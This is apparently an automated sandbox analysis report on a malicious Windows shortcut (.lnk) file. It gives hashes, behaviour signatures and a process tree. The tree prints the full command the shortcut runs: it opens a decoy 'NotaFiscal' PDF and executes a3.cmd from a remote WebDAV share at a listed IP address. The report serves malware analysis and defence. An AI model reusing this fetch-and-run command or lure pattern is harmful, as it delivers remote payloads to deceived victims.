a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
14-04-2024 01:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
Size

3KB
MD5

cd4f87e63be918ec6ef8d39082669834
SHA1

77a144bb45fff156050324b8318741bcae27d9f8
SHA256

a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef
SHA512

877e9c3d0157db9c73729f94155cf6481257d6f64dbe564678cc1e35f471b20434fa27ef901b3c1b103fd4d6b715e906fe641faba6c3e9709caf05175de0e1c2

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

AcroRd32.exe

pid process

2528 AcroRd32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

2528 AcroRd32.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

AcroRd32.exe

pid process

2528 AcroRd32.exe
2528 AcroRd32.exe

pid	process
2528	AcroRd32.exe

pid	process
2528	AcroRd32.exe

pid	process
2528	AcroRd32.exe
2528	AcroRd32.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2908 wrote to memory of 2400	2908	cmd.exe	cmd.exe
PID 2908 wrote to memory of 2400	2908	cmd.exe	cmd.exe
PID 2908 wrote to memory of 2400	2908	cmd.exe	cmd.exe
PID 2400 wrote to memory of 2528	2400	cmd.exe	AcroRd32.exe
PID 2400 wrote to memory of 2528	2400	cmd.exe	AcroRd32.exe
PID 2400 wrote to memory of 2528	2400	cmd.exe	AcroRd32.exe
PID 2400 wrote to memory of 2528	2400	cmd.exe	AcroRd32.exe
PID 2400 wrote to memory of 2564	2400	cmd.exe	cmd.exe
PID 2400 wrote to memory of 2564	2400	cmd.exe	cmd.exe
PID 2400 wrote to memory of 2564	2400	cmd.exe	cmd.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /min /c "echo Visualizacao indisponivel > C:\Users\Admin\downloads\NotaFiscal.pdf & start C:\Users\Admin\downloads\NotaFiscal.pdf & start /min cmd.exe /c "\\191.239.116.217@80\Documentos\files\a3.cmd""
2⤵
- Suspicious use of WriteProcessMemory
PID:2400

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2528

C:\Windows\system32\cmd.exe
cmd.exe /c "\\191.239.116.217@80\Documentos\files\a3.cmd"
3⤵
PID:2564

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
Filesize
3KB

MD5
f09b63daf6df766e54d259b4caa62af3

SHA1
8f95932effe7cde26cac535d684dedfae4002655

SHA256
7350eedd926ce61e5068d150beac2d5da3d030481b65422ddaf9d0281c95b38a

SHA512
820c8a57b6f7d7d1466aa91f6bbc223c40e4e95676625dbe059a94ababb88a1c236c24f9c398cd442ab31418803d4ba13ef50bc35ebacaa2a7e1c9c46d02dabf

Download Submit
C:\Users\Admin\Downloads\NotaFiscal.pdf
Filesize
29B

MD5
823a9caa296579d6a40cd5195d969727

SHA1
5592813787ecff9133229439498d624339c07ece

SHA256
60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e

SHA512
77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc

Download Submit